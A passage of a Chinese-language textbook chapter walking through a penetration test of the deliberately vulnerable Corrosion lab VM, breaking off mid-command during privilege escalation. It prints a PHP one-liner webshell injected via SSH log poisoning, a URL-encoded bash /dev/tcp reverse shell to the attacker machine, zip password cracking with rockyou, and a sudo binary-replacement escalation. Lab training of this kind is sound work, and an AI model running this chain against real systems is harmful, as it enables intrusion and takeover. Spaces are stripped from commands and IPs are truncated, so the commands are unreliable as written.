第8章-8.2-Corrosion靶機滲透測試實踐

Corrosion靶機滲透測試實踐Corrosion靶機滲透測試實踐Corrosion是一個專門構(gòu)建的易受攻擊的靶機，目標旨在通過滲透測試獲取目標靶機的控制權，進一步對所獲取到的權限進行提升。Corrosion靶機的下載地址為：/corrosion/Corrosion.ova滲透目標信息收集漏洞探測任意文件讀取漏洞利用權限提升信息收集使用arp-scan探測存活主機輸入命令：arp-scan-l信息收集使用Nmap探測開放端口，這里建議使用-P-參數(shù)進行全端口探測nmap-sV-p-74信息收集探測到主機開放的端口為22、80，其中22端口所對應服務為ssh服務，80端口所對應服務為http服務。嘗試ssh弱口令沒有成功，訪問80端口的http服務，發(fā)現(xiàn)站點首頁為Apache2的默認首頁。信息收集web目錄掃描，這里可以直接使用dirsearch工具。Kali中可以執(zhí)行以下命令進行安裝：sudoapt-getinstalldirsearch安裝完成后輸入命令進行目錄掃描：

dirsearch-uurl–e*

-u參數(shù)指定url-e指定探測的目錄及文件類型*代表所有本環(huán)境的目錄不是常規(guī)目錄名，dirsearch自帶的字典探測不到，所以需要切換字典這里使用dirbuster工具的directory-list-2.3-medium.txt字典進行掃描。使用-w參數(shù)指定字典文件，命令如下：dirsearch-u74-w/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt掃描發(fā)現(xiàn)存blog-post目錄，訪問存活目錄，沒有發(fā)現(xiàn)更多信息。信息收集進一步進行目錄掃描。dirsearch-u74/blog-post-w/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt發(fā)現(xiàn)存在archives目錄和uploads目錄。信息收集滲透目標信息收集漏洞探測任意文件讀取漏洞利用權限提升漏洞探測根據(jù)上一步信息收集所得到的內(nèi)容，進行漏洞探測。由于信息探測發(fā)現(xiàn)目錄中含有一個php文件，可以嘗試使用wfuzz工具進行模糊測試測試頁面參數(shù)。wfuzz不僅僅是一個web掃描器，Wfuzz是一個為暴力破解Web應用程序而設計的工具，它可以用于查找未鏈接的資源（目錄，servlet，腳本等），暴力GET和POST參數(shù)以檢查不同類型的注入（SQL，XSS，LDAP等），強力表單參數(shù)（用戶/密碼），F(xiàn)uzzing等。漏洞探測對randylogs.php文件進行FUZZ參數(shù)測試，具體命令如下：wfuzz-c-w/usr/share/wfuzz/wordlist/general/medium.txt--hw074/blog-post/archives/randylogs.php?FUZZ=/etc/passwd漏洞探測發(fā)現(xiàn)目標頁面存在任意文件讀取漏洞，可以利用file參數(shù)讀取/etc/passwd文件中的內(nèi)容。漏洞探測存在文件包含漏洞，那么就需要配合文件上傳漏洞上傳木馬文件，獲取webshell。由于前面探測到目標機器只開放了22,80端口，所以可以從22端口進行突破。由于ssh登錄時會將日志記錄在/var/log/auth.log。利用文件包含成功讀取到/var/log/auth.log文件。滲透目標信息收集漏洞探測任意文件讀取漏洞利用權限提升漏洞利用準備PHP一句話webshell。例如：<?phpsystem($_GET["123"]);?>。.然后進行ssh登錄，將一句話木馬作為登錄信息進行登錄，這樣就會把一句話木馬代碼寫入auth.log文件,命令如下：ssh'<?phpsystem($_GET["123"]);?>'@74漏洞利用通過包含auth.log進行命令執(zhí)行http://74/blog-post/archives/randylogs.php?file=/var/log/auth.log&123=ifconfig。漏洞利用嘗試在目標靶機中寫入反彈shell，在KaliLinux監(jiān)聽7777端口，輸入nc-lvp7777漏洞利用bash反彈shell命令：bash-c'bash-i>&/dev/tcp/31/77770>&1'進行URL編碼bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F31%2F7777%200%3E%261'漏洞利用利用文件包含漏洞繼續(xù)讀取auth.log文件訪問:74/blog-post/archives/randylogs.php?file=/var/log/auth.log&123=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F31%2F7777%200%3E%261'返回nc監(jiān)聽頁面，成功建立連接。漏洞利用由于獲取到的是www-data權限，需要進一步提權，所以繼續(xù)探測在/var/backups/目錄下發(fā)現(xiàn)備份文件user_backup.zip將備份文件利用任意文件讀取漏洞下載到kali，具體命令如下：curl74/blog-post/archives/randylogs.php?file=/var/backups/user_backup.zip-ouser_backup.zip。漏洞利用解壓user_backup.zip，需要密碼使用密碼爆破工具對該壓縮包密碼進行爆破，KaliLinux自帶爆破字典位于/usr/share/wordlists/目錄下。這里使用rockyou.txt字典文件。漏洞利用漏洞利用rockyou.txt/usr/share/wordlists/目錄下帶了rockyou的字典。2009年一家名叫rockyou的公司遭到了黑客攻擊，他們的密碼列表以明文存儲，黑客下載了所有的密碼列表并且公開。rockyou.txt包含14341564個唯一密碼，用于32603388個帳戶。rockyou.txt被壓縮，需要解壓才能夠使用解壓密碼字典文件壓縮文件，具體命令如下：gzip-d/usr/share/wordlists/rockyou.txt.gz漏洞利用使用Fcrackzip工具對壓縮包密碼進行爆破，具體命令如下：fcrackzip-D-p/usr/share/wordlists/rockyou.txt-uuser_backup.zip漏洞利用解壓文件，發(fā)現(xiàn)壓縮包內(nèi)含有my_password.txt文件，獲取文件內(nèi)密碼。漏洞利用從前面的讀取到的/etc/passwd中發(fā)現(xiàn)存在randy用戶，猜測這個密碼可能是randy用戶的。對目標靶機登錄，并登錄成功。sshrandy@74滲透目標信息收集漏洞探測任意文件讀取漏洞利用權限提升權限提升輸入“sudo-l”查看普通用戶可以執(zhí)行的sudo權限在查看可用命令時發(fā)現(xiàn)有可以使用普通用戶來執(zhí)行的root權限文件，為easysysinfo，嘗試執(zhí)行該文件?？梢园l(fā)現(xiàn)該文件執(zhí)行過后會顯示easysysinfo.c中的命令權限提升權限提升嘗試提權，將獲得shell的C文件最后一行修改為“bash-i”，然后進行編譯，接著去覆蓋easysysinfo文件，覆蓋后的文件也將獲取和之前文件相同的權限。在kali中利用python啟動一個http服務python3-mhttp.server8000讓目標主機去下載這個C文件wget31:8000/easysysinfo.c權限提升權限提升刪除原先的文件rm-rfeasysysinfo編譯該文件gcceasysysinfo.c-oeasys